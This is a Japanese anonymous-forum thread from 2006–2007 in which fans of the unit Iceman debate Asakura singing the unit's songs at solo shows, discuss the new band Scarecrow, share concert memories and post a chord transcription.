だいぶ趣が違うよな・・・・あっちのほうが数倍マシ

175 :伝説の名無しさん:2006/10/10(火) 20:33:23
アイスマンも西川みたいに揉めてれば楽曲にノータッチだったかも知れないのにね 残念w

176 :伝説の名無しさん:2006/10/10(火) 20:40:57
単に浅倉が気に入らないだけな気がしてならないな

他の二人だってソロライブで歌ったりしてるだろ
黒歴史にされて葬り去られる方が俺は悲しい

177 :伝説の名無しさん:2006/10/10(火) 21:32:56
やってみてキモくないかどうかが分かれ目だろ
他人の歌のカバーってそういうもん

178 :伝説の名無しさん:2006/10/10(火) 21:57:46
浅倉のカバーが気に入らないならCDだけ聞いとけばおk

179 :伝説の名無しさん:2006/10/10(火) 22:50:50
俺としてはむしろ浅倉が十数曲IM曲歌ってCDにしてもらっても嬉しいくらいだな。
もちろん伊藤ででも黒田ででも大変嬉しい。

180 :伝説の名無しさん:2006/10/10(火) 23:10:15
3人がIMの事を黒歴史にしたりせず、アレンジして聴かせてくれる今の環境は寧ろ幸せだと自分は思う

181 :伝説の名無しさん:2006/10/10(火) 23:14:32
やるなら曲だけにしろよー
どうせヴォコーダー通したわけわかんない音声の上に口パクなんでしょ
IMのときにアクセスのカバーやってたけどさすがに歌わなかったじゃん
やるなら雰囲気と思い出壊さない程度にしてくれw

182 :伝説の名無しさん:2006/10/10(火) 23:19:03
ってか浅倉に文句を言ってる奴ら、その浅倉の曲で当時キャーキャー言ってたのはおまえらだろうがw

183 :伝説の名無しさん:2006/10/10(火) 23:23:13
思い出を壊されるって感覚が俺にはよく判らん。

184 :伝説の名無しさん:2006/10/10(火) 23:29:42
俺にはリアルでゲートアウトを聞いてるな
位の認識しかないw

185 :伝説の名無しさん:2006/10/10(火) 23:30:14
>>182
文句は曲じゃなくて歌でそ

186 :伝説の名無しさん:2006/10/10(火) 23:31:18
ソロで歌うのは96年まででやめとくべきだったな

187 :伝説の名無しさん:2006/10/10(火) 23:33:57
まあなんつーか、
黒田ヲタ乙

結局浅倉の曲だからなー。
そーいや、ソロでユニットの曲をやることには
もうすこしデリケートでもいいと思うものだが
なんか昔からこうだから、全然気にしてなかったというか、忘れてた

188 :伝説の名無しさん:2006/10/10(火) 23:38:52
>183
俺もだよ
そして浅倉だけが妙に槍玉に挙げられてる気がする

歌唱力無いのに歌うなとか言うのは余計なお世話だw
聞かなきゃいいだけの話
俺は歌よりアレンジ楽しんでるから気にならん

189 :伝説の名無しさん:2006/10/11(水) 00:12:30
伊藤は伊藤の歌を歌ってるだけだが
浅倉は黒田の歌を歌ってるから気に食わないのかな

で、黒田ヲタさんたちは伊藤については文句ないの?

190 :伝説の名無しさん:2006/10/11(水) 00:23:12
自分は氷オタで浅倉の音は好きだが浅倉個人に全然興味ないのだが
浅倉ソロ行ったけど楽しかったぞ
黒田の声じゃなきゃ嫌だとか小難しい感情は忘れてたな
自分はリアルタイムでファンじゃなかったからかもしれないけど
ライブという空間で氷が聞けた事に一番感動したよ
むしろtmrの曲が1曲も無かった事の方が気になったw

191 :伝説の名無しさん:2006/10/11(水) 00:28:21
まだコダワルか君は

192 :伝説の名無しさん:2006/10/11(水) 00:35:38
俺は浅倉であれ黒田であれ伊藤であれ
IMの曲やってくれるのは無条件で嬉しいけどな
あの神曲達がもう演奏されなくなるなんてもったいねーよ

193 :伝説の名無しさん:2006/10/11(水) 00:39:32
>190
お前は俺かwww

特にサイコのイントロ聴いた瞬間は鳥肌たった


194 :伝説の名無しさん:2006/10/11(水) 00:53:20
情緒不安定な関係をもう変えてしまえ

195 :伝説の名無しさん:2006/10/11(水) 00:59:26
アイスマンの楽曲はマダマダ生きてるってことでおK

浅倉ライブでIM流れた途端、脳内で何かが振り切れた
変わったのは浅倉が歌ってることと、柴チャンに貫禄ついたことくらいだw
たのしかった

196 :伝説の名無しさん:2006/10/11(水) 01:01:36
柴チャン最高だった

197 :伝説の名無しさん:2006/10/11(水) 01:19:53
サイコとシャイコレはやっぱ流れると引きが凄いと思ったわ。

198 :伝説の名無しさん:2006/10/11(水) 02:06:14
浅倉のIM歌いは勘弁してくれ、だが


黒田ヲタじゃねーーーーーーーーーーーーーーーよ!

199 :伝説の名無しさん:2006/10/11(水) 02:42:37
サイコのイントロが流れた瞬間の会場の盛り上がりは凄かった
みんなIMやっぱり聞きたいんだなってうれしく思った

200 :伝説の名無しさん:2006/10/11(水) 03:03:57
Im曲は聴きたいけど浅倉は歌わなくていい

201 :伝説の名無しさん:2006/10/11(水) 03:26:11
浅倉は歌うなと言ってるのは一人か二人が頑張ってるの?

202 :伝説の名無しさん:2006/10/11(水) 03:45:51
じゃあライブ行くなとかCD聞いてろとか
そんなこと言われたら元も子もないじゃないか
3人でのIMに思い入れがあるからこそ複雑なんだよ

で、言っておくが俺も
黒田ヲタじゃねーーーーーーーーーーーーーーーよ!

203 :伝説の名無しさん:2006/10/11(水) 06:48:37
んじゃ黒田や伊藤がソロライブで歌った時にも同じ事言ってくれよ

浅倉のソロライブで黒田が歌うわけないだろう?
自分から聞きに行っといて「歌うな」とか「悲しい」とか…
そりゃ部屋でCD聞いとけって言うしかないだろうよ

俺だって3人のIMが好きだが「浅倉歌うな」っては思わない
逆に浅倉だけ批判されてることに違和感感じるね

204 :伝説の名無しさん:2006/10/11(水) 09:15:39
インストなら感動するが
浅倉に歌われると萎える

205 :伝説の名無しさん:2006/10/11(水) 12:57:04
浅倉のソロライブに行かなきゃカバーは聴けないはずだが
萎えるためにわざわざ聴きに行ってんの?

206 :伝説の名無しさん:2006/10/11(水) 15:10:55
>>203
浅倉の歌なんてボーカルとして聴くもんじゃないだろ。
ありゃ楽器とか音素材の一種として捉えるもんだ。実質インストみたいな物じゃないか?w

207 :伝説の名無しさん:2006/10/11(水) 15:58:46
>>204

 ハ ゲ 同 意

208 :伝説の名無しさん:2006/10/11(水) 17:50:47
久しぶりにスレ回ってると思ったら…('A`)萎えるならCD聞いときゃ済む話な気がする


3人がそれぞれIMの曲をやってくれる現状は俺は嬉しいよ
ちゃんと曲を認めてくれてるんだなと

209 :伝説の名無しさん:2006/10/11(水) 18:10:06
浅倉の声質が問題なだけじゃないのか?
浅倉が歌ってるIM曲を歌ってれば問題無かったんだと思うが・・・

伊藤が歌ってるのは、実質伊藤が作った曲でボーカルも伊藤だから誰も気にしないんだと思う

210 :伝説の名無しさん:2006/10/11(水) 18:23:15
基本的に浅倉ヲタしか来ないソロライブで歌う位別にいいんじゃねーの?
強制的に聞かされてる訳じゃなし
聴きたくないなら取捨選択できる訳で

211 :伝説の名無しさん:2006/10/11(水) 18:30:57
楽曲提供した人がセルフカバーするのってよくあるしね
つーかそんなに浅倉が嫌いならなんでライヴに行ったのかと

212 :伝説の名無しさん:2006/10/11(水) 19:08:04
おまえらいい加減にしろ!!!!!!


小室先生に耳元でせーんの〜ねが〜いが〜♪歌われるのと
浅倉先生に耳元でランニグトゥーホラァゾン♪歌われるのと
どっちがいい!!(・∀・#)

213 :伝説の名無しさん:2006/10/11(水) 19:13:17
だから俺は浅倉ライブなんて行ってない

214 :伝説の名無しさん:2006/10/11(水) 19:13:27
どっちも変わらん。どちらも超音波的騒音。

215 :伝説の名無しさん:2006/10/11(水) 19:15:01
>>212
脳内再生してみた








やべぇ、どっちも聞きたいw

216 :伝説の名無しさん:2006/10/11(水) 19:28:32
>>209
ある意味、小室のヴォーカルと似たようなもんだな

黒田、伊藤のパートまで歌うのはいかにも無理がある

217 :伝説の名無しさん:2006/10/11(水) 19:29:46
なんだ、単に浅倉を貶したいだけか

218 :伝説の名無しさん:2006/10/11(水) 21:17:21
つか権利が浅倉にあるものを他人がとやかく言うことは無い

219 :伝説の名無しさん:2006/10/11(水) 22:34:13
>213
行ってもいないし聴いてもいないのを貶しているのか
そりゃ勿体無い、聴いてから貶してみたらどうだ
マトリックスのアレンジは原曲よりハードになっていて最高だったぞ


220 :伝説の名無しさん:2006/10/11(水) 23:40:55
あのマトリックスが黄盤に入ってたら良かったのに

221 :伝説の名無しさん:2006/10/11(水) 23:56:53
アレンジだけやって歌わなきゃいいんだよ

222 :伝説の名無しさん:2006/10/12(木) 00:10:36
>>221
ボーカルが居なくて自分が歌うしかない浅倉の身にもなってやれよ・・・

223 :伝説の名無しさん:2006/10/12(木) 00:22:08
さがしゃ見つかるだろ。
どう考えても本人が歌うより最悪の選択肢にはなりえないんだから。

224 :伝説の名無しさん:2006/10/12(木) 00:25:23
じゃあ黒田いらねーじゃん

225 :伝説の名無しさん:2006/10/12(木) 00:26:16
さがして見つけたボーカルより浅倉のほうがマシだと思うがw

226 :伝説の名無しさん:2006/10/12(木) 00:35:31
じゃあkimeruに歌わせてみようw

227 :伝説の名無しさん:2006/10/12(木) 00:42:59
黒田以外が歌ったら意味ねーからボーカルいれなかったんだろ
浅倉もIMが終わるとき「このメンバーだからIMだ」と言ってる

歌上手い奴つれてきて歌わせてファンが納得しないって分かってるだろうし
歌入れるなら浅倉以外いないんじゃねーの?
インストじゃ駄目な理由は歌モノだから歌は入れるとかそんなもんだろ

228 :伝説の名無しさん:2006/10/12(木) 00:51:30
黒田ヲタじゃねーことはわかったが
浅倉を貶めたいだけだったこともよくわかったw

229 :伝説の名無しさん:2006/10/12(木) 00:52:23
マトリクスはインストでもやってたしな
インストって手も、ボーカルって手もあると

230 :伝説の名無しさん:2006/10/12(木) 06:56:28
>>222
Imのライヴとかの中でインストでやってたじゃん

231 :伝説の名無しさん:2006/10/12(木) 10:06:45
浅倉信者ってホントどこ行っても救いようが無いな
まさに「信者」って言い方がピッタリ

232 :伝説の名無しさん:2006/10/12(木) 13:39:09
はいはいマンセーマンセー

233 :伝説の名無しさん:2006/10/12(木) 20:47:38
はいはいマンセーマンセー
浅倉様はネ申!!!

こんなもんかw

234 :伝説の名無しさん:2006/10/12(木) 22:38:14
ゲイスポでも平気で「御大」と言ってのけるwwwww
頭がマヒしてる連中wwwww

それが信者クオリチー

235 :伝説の名無しさん:2006/10/13(金) 00:01:43
つうかあくまでキーボーディスト、作曲家としての才能で生きてこれた人間なんだから、
歌われてもなぁ、と思う。
実際メインヴォーカルはれるような声質じゃないんだし。
小室にもいえることだけどな。

236 :伝説の名無しさん:2006/10/13(金) 00:15:52
スレが異様に伸びていると思ったら何の祭りだ?
つか何でこんなに浅倉叩かれているんだ?
何かやらかしたのか?歌っただけだよな?

237 :伝説の名無しさん:2006/10/13(金) 01:02:45
浅倉が「このメンバーだからIMなんだ」と言う様に
一部のヲは「黒田がボーカルだからIMなんだ」と思ってるってだけだろ

別に叩いてるわけじゃなく、個々の意見を述べてるだけだと思うが・・・

238 :伝説の名無しさん:2006/10/13(金) 01:03:38
× 一部のヲは
○ 一部のヲタは

間違えたスマソ

239 :伝説の名無しさん:2006/10/13(金) 01:04:26
俺は黒田びいきでもなんでもないけどね。

一番ファンなのは浅倉だけど、その才能は作曲、プレイのみで歌にはないと思っているので、
歌われても別にうれしくはないだけ。

240 :伝説の名無しさん:2006/10/13(金) 01:16:14
Icemanとしてでなく、浅倉大介としてセルフカバーしただけで、
なんでこんな言われようなのか・・・


・・・逆に、今でも思い入れのある人がこんだけ居るってのはいい事かもしれんな。

世間によくあるプロデューサーのユニットって、結構
「そういえばそういうのあったね」で忘れ去られるような事が多いだけに。

241 :伝説の名無しさん:2006/10/13(金) 01:19:09
歌っただけで苦情って
まるでジャイアンだなw


自分はこれからも浅倉リサイタル希望
やっぱりライブでは歌が乗ってたほうが聞きやすい

242 :伝説の名無しさん:2006/10/13(金) 01:28:13
浅倉の歌ってインストに近いくらい主張ないからなw
歌として聴いたことがあんまりないと気付いた

243 :伝説の名無しさん:2006/10/13(金) 06:58:53
>>235
原形とどめないほどに加工しまくりじゃないと聞けたもんじゃないしな
しかも口パクだしw、さすがに見てて醒める
そこまでしなくてもって思った

244 :伝説の名無しさん:2006/10/13(金) 10:33:42
生のときもありますがね

245 :伝説の名無しさん:2006/10/13(金) 10:56:12
電波声

246 :浅倉withオレンジ:2006/10/13(金) 17:13:31
アッアッー!なんかいいかんじイッー!

247 :伝説の名無しさん:2006/10/13(金) 21:11:16
基本その場でも歌っているだろ。重ねてだけどw

そりゃ三人揃うに越した事は無いけど無理だしなぁ
自分はそれぞれやってくれるだけでも嬉しい

248 :伝説の名無しさん:2006/10/13(金) 21:36:47
そうだよ黒田と伊藤が組んだって事は
もう浅倉しかセルフカバーしてくれなそうだし
頑張ってくれよ浅倉w

249 :伝説の名無しさん:2006/10/13(金) 22:13:19
IMのGATEの1聞いてる。先月コンポ取得して中古探しに行ったら見た瞬間に即決した。
カッコイイ、マジで。そして速い。再生を押すと歌い出す、マジで。ちょっと
感動。しかもメロスピなのにDAだからドラムも打ち込みで良い。MKは歌唱力が無いと言わ
れてるけど個人的には上手いと思う。ター坊と比べればそりゃちょっとは違うかもし
れないけど、そんなに大差はないって浅倉も言ってたし、それは間違いないと思う。
ただ停電とかでマック止まるとちょっと怖いね。MK歌ってるのに音楽前に進まないし。
ギターにかんしては多分ター坊もIMも変わらないでしょ。ター坊聞いたことないから
知らないけどイトーが弾くか弾かないかでそんなに変わったらアホ臭くてだれもIMな
んて買わないでしょ。個人的にはIMでも十分に上手い。
嘘かと思われるかも知れないけど代々木体育館でBPM196位でマジでX JAPANを
抜いた。つまりはXですらGATEのIMには勝てないと言うわけで、それだけでも個
人的には大満足です。

250 :伝説の名無しさん:2006/10/13(金) 22:22:14
悪いが日本語に翻訳してくんね?
意味わからん

251 :伝説の名無しさん:2006/10/13(金) 22:41:11
なんかの改変コピペじゃねーの

252 :伝説の名無しさん:2006/10/13(金) 22:49:30
おk

253 :伝説の名無しさん:2006/10/14(土) 00:44:30
伝説の神GTOのコピペ知らない猿がいるのか……


てかその改変つまんねーんだよハゲ




たかみってリアルで歌うとかなり下手だな………_| ̄|〇
まだ黒田はマシだろ

254 :伝説の名無しさん:2006/10/14(土) 01:28:09
>253
゚(∀) ゚ エッ?

どこのタカミ?w

255 :伝説の名無しさん:2006/10/14(土) 06:24:25
ター坊って久々に見たw

256 :伝説の名無しさん:2006/10/14(土) 11:20:32
>>254
高見沢

257 :伝説の名無しさん:2006/10/14(土) 14:48:53
ダイバスターのエンディングか

258 :伝説の名無しさん:2006/10/14(土) 18:14:08
はぁーIM解散?するなんて知ってたら
あのライブいってたのにな…

CD聞くたび思い出して悔やまれるorz

259 :伝説の名無しさん:2006/10/14(土) 22:10:16
>258
99年の代々木4DAYSと就職した会社の研修がマルかぶりしたのを思い出したwww

結局転職したが…orz

260 :伝説の名無しさん:2006/10/14(土) 22:12:09
なあなあ
黒田と伊藤のバンドで
IM曲やったらどう思う?
俺、浅倉にやられるより嫌なんだが
もしかして少数派?

261 :伝説の名無しさん:2006/10/14(土) 22:22:01
自分は割と浅倉寄りなオタだが普通に歓迎だな。浅倉だろうが黒田+伊藤のバンドだろうが、
IM時代の曲を複数やるというならその曲目次第で普通にライブに聴きに行きたい。

262 :伝説の名無しさん:2006/10/14(土) 23:17:53
個々にソロを追っかけている(若干黒田と伊藤寄りだが浅倉アンチではない)のだが、
黒田と伊藤のバンドでIM曲というのは絶対にありえないし
想像することもできないくらいありえないと断言できるので
そんなこと考えたこともない。
寧ろIM曲やったらそんな二人を見損なう。
まぁ、やられた瞬間は嬉しいと思うがw

263 :伝説の名無しさん:2006/10/15(日) 00:49:01
どっちにしろ2/3では超高速曲は無いと思うから別に構わない
262がいうようにあえてIM曲はやらないとだろうがな



264 :伝説の名無しさん:2006/10/15(日) 01:06:38
一ファンの感情としてはソロは良いけど誰かを抜いた2人でやるのは微妙
黒田・伊藤しかり浅倉・伊藤しかり浅倉・黒田しかり

私見だが黒田と伊藤ってIMでデビューしたせいかすごく想い入れがあるように感じる
(浅倉には想い入れがないってことじゃなく)
2人いるからIMやろうぜなんてことはしないと思うがな



265 :伝説の名無しさん:2006/10/15(日) 07:10:49
>>258-259
4日間連続は耳が死んだ・・・仕事中つらかったよ
せめて真ん中に1日入れるべきだったな

苗場は仕切りがグダグダで揉めたりもしたけど楽しかったな

266 :07012310153682_vs:2006/10/15(日) 08:01:37
syosinsya

267 :伝説の名無しさん:2006/10/15(日) 20:40:59
>265
急遽予定になかったイベントが夜に追加されてコンタクト使用時間に
慌てた記憶がw
ファンイベントとしては本人達との交流も沢山あったし楽しかったな
あの時のライブで黒田が泣いたのはやっぱり休止が決まっていたからなんだな



268 :伝説の名無しさん:2006/10/15(日) 20:45:22
いーなあ
苗場は家庭の事情で行かれなかった
人生後悔のベスト3に入る

269 :伝説の名無しさん:2006/10/19(木) 10:37:53
不思議現象を話し合ったコーナー、なんだったっけ?

「朝までムー」だったっけ?

270 :伝説の名無しさん:2006/10/19(木) 16:35:47
なわとびの回し方がヘタクソで、やっぱ男だなぁと思った


「マイクを床に置けーーー!」と大騒ぎだったうちの組w

271 :伝説の名無しさん:2006/10/20(金) 22:56:12
何故かageておくぜ。

クロダの公式みたら、おどろいた。
ここのスレでやってたような「ライブ映像同時再生してワイワイ実況」をするらしい。

クロダ貴様ッ!見ているな!? URYYYYYYYYYYYY!!!!

272 :伝説の名無しさん:2006/10/21(土) 02:01:02
この間の会報に故黒田という表現が出てきたらしいので
間違いなくみていると思われる

273 :伝説の名無しさん:2006/10/21(土) 03:26:29
1 :以下、名無しにかわりましてクラウザーII世がお送りします :佐賀暦2006年,2006/10/21(佐賀) 03:06:08.95 ID:V3952WHV0
http://lunaticasylum.ddo.jp:4000/

俺は浅倉大介に感謝している。
ファンにならなければ猟奇的殺人者になっていたから・・・

リクエストせよ リクエストせよ

+地獄の掟+
・特に指定がない限り手持ちの全ヴァージョンを流す
・ヴァージョンの多いものより少ないものを優先させることがある
・TMR-eがリクエストされたときはSuite Seasonを丸ごと流す
・access三部作がリクエストされたときはすべて流す
・コタニキンヤの「〜熱」がリクエストされたときは3作全部流す
・気まぐれに全然関係ない音源が流されることがある

地獄の楽屋裏メッセで魔界の闇鍋を開催中 SANKAせよ
breathless_night_slider@hotmail.co.jp TOUROKUせよ TOUROKUせよ


274 :伝説の名無しさん:2006/10/21(土) 10:17:33
大佐、どうやら怪しい電波が紛れ込んでいる様だ

275 :伝説の名無しさん:2006/10/27(金) 01:14:39
明日の伊藤ライブはまたIcemanきけるのかなー。
スタッフの書き込み、普段は萎えるけど、
こういう時はGJ!と思う。

276 :伝説の名無しさん:2006/11/01(水) 23:19:31
夢心地、夢心地

久々にこのフレーズ聴いたw

277 :伝説の名無しさん:2006/11/02(木) 15:19:20
なぜかバクチクスレでみつけてしまったww

487 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/10/31(火) 02:54:54 ID:WIuRfTWZO
★黒田倫弘×伊藤賢一★ex‐Iceman率いるニュ‐プロジェクト【SCARECROW】

2007 xxx debut!!

★SCARECROW menber★
Vo. 黒田倫弘
Gc. 伊藤賢一
Ba. 石橋政得
Dr. 水江秀樹

by devil curve

278 :伝説の名無しさん:2006/11/02(木) 16:31:20
www
バクチクと何の関係が?www

宣伝になるならうれしいけどw

279 :伝説の名無しさん:2006/11/02(木) 20:08:18
スケアクロウ色んなスレに張られてないか?
意図が見えない、ただの宣伝ならウザ

280 :伝説の名無しさん:2006/11/02(木) 20:35:15
浅倉伊藤オタの外人かと思ったが外人なら「menber」とは書かないよなw


塚、名前違うしw
Ba. 石橋政得
Dr. 水江秀樹

281 :伝説の名無しさん:2006/11/02(木) 21:07:52
なーにがスケア苦労だよ
超うぜえ


282 :伝説の名無しさん:2006/11/02(木) 22:55:35
>281
ウザければスルーでどぞ〜

やっぱり伊藤と音楽やるとなると
黒田は攻撃的(?)な音を求めてるらしい。
久々にカッコイイ音楽きけるかな〜。

283 :伝説の名無しさん:2006/11/03(金) 00:20:35
去年のアルバム参加のとき、
なんか黒田って伊藤の音楽性を勘違いしてんじゃねーかと思ったことある
まあ、一緒にやるくらいだからその辺は払拭されてるとは思うが。
今、譲れない部分がお互いあって喧嘩するみたいにやってるって言うが
それがやり方でなのか方向性でなのかで違うよなw

まあ、どうでもいいんだけどね
IMじゃない黒田に興味ねえし。

284 :伝説の名無しさん:2006/11/03(金) 01:49:53
IMじゃない黒田に興味ねぇし…

燃やしてくれ〜♪凍り付く前に

燃やしてくれ〜♪捨てきれない物〜♪

ゼロの気持ち
SONG by 【doa】

285 :伝説の名無しさん:2006/11/03(金) 23:31:38
何でdoa?好きだけどw

286 :伝説の名無しさん:2006/11/08(水) 01:43:14
今日のスケアクロウのライブ行った奴いるの?

287 :伝説の名無しさん:2006/11/08(水) 01:51:18
ノシ

288 :伝説の名無しさん:2006/11/08(水) 23:26:33
ノシ

黒田が老けてた
伊藤が円くなってた

289 :伝説の名無しさん:2006/11/09(木) 18:05:45
何故か赤髪のまま、丸々と肥えて満面の笑顔の伊藤を思い浮かべてしまった。

290 :伝説の名無しさん:2006/11/11(土) 01:40:13
ほっぺとかてかてかで、上着のポケットからあんパン出しそうな感じか…。

291 :伝説の名無しさん:2006/11/11(土) 16:19:45
陽気な外人ギタリストのイメージ

292 :伝説の名無しさん:2006/11/11(土) 17:02:37
隣の黒田は老けすぎて枯れ木

293 :伝説の名無しさん:2006/11/14(火) 03:18:40
テスト

294 :5:2006/11/15(水) 19:07:04
ICEMANサイコー

295 :伝説の名無しさん:2006/11/15(水) 22:18:32
黒田がプロトで初披露したのは側宙だったような…
見間違いだったのか


296 :伝説の名無しさん:2006/11/18(土) 14:21:14
赤い髪にするにはどうすればいいんだ
うちみたいな田舎では誰も教えてくれん

297 :伝説の名無しさん:2006/11/19(日) 01:15:07
>>296
新宿アルタ前に詳しい人がいるから聞いてみるといいよ

298 :伝説の名無しさん:2006/11/19(日) 07:59:05
>>296
今日、鶯谷に居る人に聞いたら誰かが教えてくれると思うよ

299 :伝説の名無しさん:2006/11/19(日) 16:04:46
>296
金髪にしてから赤いヘアマニキュアをする。
赤くした毛は黒く染まらんから気を付けれ
とマジレスしてみる

300 :伝説の名無しさん:2006/12/02(土) 03:24:36
スケアクロウってピロウズの新曲とかぶってる・・・

301 :伝説の名無しさん:2006/12/04(月) 23:17:41
>>297
亀だがワロスww
自分も気になってたよあの人…

NHKのスタジオパーク?にもいたよ、前に。


伊藤ってあの髪型にするのに
1回でスプレー1本ぐらい使っちゃうんだろうな

302 :伝説の名無しさん:2006/12/07(木) 23:39:52
Iceman 11番目の罪…

303 :伝説の名無しさん:2006/12/09(土) 23:33:00
>>301あの人確か実況板では「いつもの人」と呼ばれてたよ。
以前はラジかるにも毎日映り込んでた。
今は注意されたのか何なのか知らないがいいともでしか見かけない。

304 :伝説の名無しさん:2006/12/11(月) 23:53:18
今日アリーナを立ち読みしたら、マスカレードっていうユニットのGの子が、「灰汁と氷男を聞いてた」と語ってて、ちょっと嬉しい気持ちになったよ

305 :伝説の名無しさん:2006/12/28(木) 20:15:24
あげといてやんよ
感謝しろよ?

306 :伝説の名無しさん:2006/12/28(木) 21:07:29
2000年カウントダウンを思い出しながらウンコしてくるよ

307 :伝説の名無しさん:2006/12/30(土) 09:46:07
えきすぱんだぁ〜
どらいまっすぃ〜ん
夢心地 夢心地

308 :伝説の名無しさん:2006/12/31(日) 00:40:48
自分も年末になるとカウントダウン思い出す
>>306とうんこしてくるわ

309 :伝説の名無しさん:2007/01/01(月) 21:40:03
あの時の終演アナウンス、黒田だったような気がするのだが…。

310 :伝説の名無しさん:2007/01/02(火) 09:04:45
気のせい

311 :伝説の名無しさん:2007/01/10(水) 00:32:42
すげー過疎ってるw

こんな状態のスレで聞いてもしょうがないかも試練が
スケアクロウってIMヲタ的にどう?
ダチに週末のライブに誘われたんだが…
一度位見といても良いかなあと思いつつチケ代が高くて驚いたwww



312 :伝説の名無しさん:2007/01/10(水) 00:51:04
IMとは何の関係も無いものだと思っている
きっとヌルい音だろうからな

313 :伝説の名無しさん:2007/01/10(水) 00:59:11
伊藤ソロを黒田が歌い、
黒田ソロを黒田が歌う
それがスケアクロウ

ぶっちゃけ何も生み出してないw
ちょっと期待したんだが失望した。

314 :伝説の名無しさん:2007/01/10(水) 02:53:35
>311
IMヲタにスケアクロウについて聞くのは不毛なような…
音楽的にメインはってる人が違うし、そもそもあっちは4人編成のバンドだし
せいぜい上のレスくらいの返答しか返って来ない

気に障ったならスマソだが、自分の耳でどんなもんか確かめた方がいいかもよ
チケ代高いけどw


315 :伝説の名無しさん:2007/01/10(水) 03:47:19
IMと比べるならまだ見ないほうがいい
糞高いチケ代に見合わない音楽の質に失望するだけだ

活動費援助と思うなら別だがw

316 :伝説の名無しさん:2007/01/10(水) 21:12:33
私はIMとは全く別物として見てる。
浅倉ヲタならまじでオススメしません。

317 :伝説の名無しさん:2007/01/10(水) 22:15:18
伊藤もな、DTMこなしてるくせに
変にバンド音から抜け出せてないから
どうも音楽的に幅がないんだよな
まあそれもそれで個性なのかもしれないがな
www

伊藤とか黒田の音楽って
西川に近い気がする
奴らみんなバンド好きだし

318 :伝説の名無しさん:2007/01/11(木) 18:13:02
スケアクロウってレギュラー稼動してるの?

319 :伝説の名無しさん:2007/01/11(木) 22:29:33
>318
今のところ3月のライブは決まってるみたいだけど…
てかスレ違いだからw

上でスケアクロウについて聞いてた人、結局週末のライブはどうするんだろ
ちょっと気になる

320 :311:2007/01/12(金) 23:24:00
>319
今日のチケなら半額にしてくれるっつーからw
さっきの1本目見てきたYO

ここで印象聞いてったからそんなに期待もしてなかったんだどなかなか面白かった
でも全体的に二昔くらい前のバンドって感じだった

しかし黒田は歌上手くなった気がするけど伊藤はギター下手になってね?
過去が美化されるだけだろうか…
GATEツアーのビデオでも見てみるか

長文、チラ裏スマソ

321 :320:2007/01/12(金) 23:26:15
× してなかったんだど
○ してなかったんだけど

重ね重ねスマソ

322 :伝説の名無しさん:2007/01/13(土) 00:45:33
>320
下手になったというか、あんまり変わって無いんだとおも。
氷時代はたいして弾いてなかったが、
今はあの時よりシンク音少なくて弾く量も多いから、
奇妙なギターが目立って聞こえるんかと。

323 :伝説の名無しさん:2007/01/13(土) 01:56:49
ギターリスト居るのに
レコーディングでサポート呼ぶなんて容赦ねーなー
と思った・・・

324 :伝説の名無しさん:2007/01/13(土) 03:49:19
>317
音楽的な幅は西川よりはましだろう
歌唱力はともかく

325 :伝説の名無しさん:2007/01/14(日) 04:37:44
俺はIM時代より今の方が上手いと思うがw気のせい?
まあ、伊藤は純粋にギターを弾く、というより
ギターを使って音を出してる、っていうか
なんつーのこれ
とにかくソロコーナーのキュイーンとかギュイーンとかが
浅倉のシンセソロとかぶらねえ?
あ、こりゃこいつ純粋なギタリストじゃねーんだなと思った

326 :伝説の名無しさん:2007/01/14(日) 04:38:25
>324
幅は確かに西川よりはあるかもしれないが
音的には被ってる

327 :伝説の名無しさん:2007/01/14(日) 04:45:58
>>325
伊藤のギター見てると
弾いてるのと同じくらいの勢いで
ツマミ弄ったりレバー引っ張ったりペダル踏んだり忙しいからな

328 :伝説の名無しさん:2007/01/14(日) 09:32:00
スケアクロウってなんだ?黒田と伊藤のバンド?
そんな話きいてねーぞ!と思ってて


部屋片付けしてたら、去年66から送られてきたDMが見つかった・・・
ぜんぜん見てなかったらしい orz

329 :伝説の名無しさん:2007/01/14(日) 13:58:39
>328
見てやれよwww
4月にデビューするぞ。

330 :伝説の名無しさん:2007/01/14(日) 15:12:03
山が〜動いた〜♪


って曲が好き

331 :伝説の名無しさん:2007/01/14(日) 15:36:25
夏が〜動いた〜♪


って曲が好き

(ノД`)シクシク

332 :伝説の名無しさん:2007/01/14(日) 17:57:57
>330
激しくワロタwwww
山が動いた瞬間にどうやってケリをつけるんだよwwwwwww

333 :伝説の名無しさん:2007/01/14(日) 20:40:20
風林火山もびっくり

334 :伝説の名無しさん:2007/01/15(月) 07:19:56
ズラが〜動いた〜♪


という替え歌は聴いたことあるがな

335 :伝説の名無しさん:2007/01/16(火) 18:26:40
DASEINwo集めてる

336 :伝説の名無しさん:2007/01/16(火) 21:04:28
【ピコピコ】ソフバとか浅倉系とかその辺 Part2【マンセー】
http://music6.2ch.net/test/read.cgi/msaloon/1060014613/

337 :伝説の名無しさん:2007/01/25(木) 11:03:12
いまだに黒と伊藤の声の違いがわからない


Dやタイムマシンは全部伊藤だよな?
違う?

ジェネボムは黒→朝→糸でおけ?

338 :伝説の名無しさん:2007/01/25(木) 11:43:43
あのカミソリ系の声の区別がつかんとは・・・・

どんなオーディオ機器で聞いてるんだ?

339 :伝説の名無しさん:2007/01/26(金) 19:47:39
パワーが無くて壊れそうなのに印象ある声が黒。
何か鼻にかかったような、妙にコブシがきいてる唄い方をしてるのが糸。

340 :伝説の名無しさん:2007/01/27(土) 16:41:22
>>337は音痴と思われ

341 :伝説の名無しさん:2007/01/27(土) 20:20:04
>>340はウンチと思われ

342 :伝説の名無しさん:2007/01/27(土) 22:20:59
バンドスコア出てないんだよね?
誰かブレスラのコードだけでも判る人いない?

343 :伝説の名無しさん:2007/01/27(土) 23:13:20
>>342
今ざっと耳コピしてみた
"|"が小節の区切り、"/"は小節内で動くコード、空白は前小節と同じ

【イントロのキメ】
| E/D/E |

【サビ】
| Am | | F | | G | G#dim | Am | Am/F/G |
| Am | | F | | G | E | F | G |

【間奏〜Aメロ】
| F#m |  | D | E | の繰り返し

【Bメロ】
| G | F#m | A | G#m | G | F#m | E |

【2コーラス後の間奏】
| F#m |  | D | E | F#m |  | D | E |
| D/E | F/G | D/E | F/G | D/E | F/G | D/E | F/G | G |


構成は
【キメ】ー【サビ】ー【間奏〜A】ー【B】ー【サビ】ー【間奏〜A】ー【B】ー【サビ】
ー【2コーラス後の間奏】ー【サビ(最後1小節が【キメ】)】×3ー| Am |

344 :伝説の名無しさん:2007/01/27(土) 23:22:06
訂正。

【B】の後ろに【キメ】、ただし2コーラス目までは | C#/B/C# |
【B】の最後、| E | じゃなくて | Esus4 |
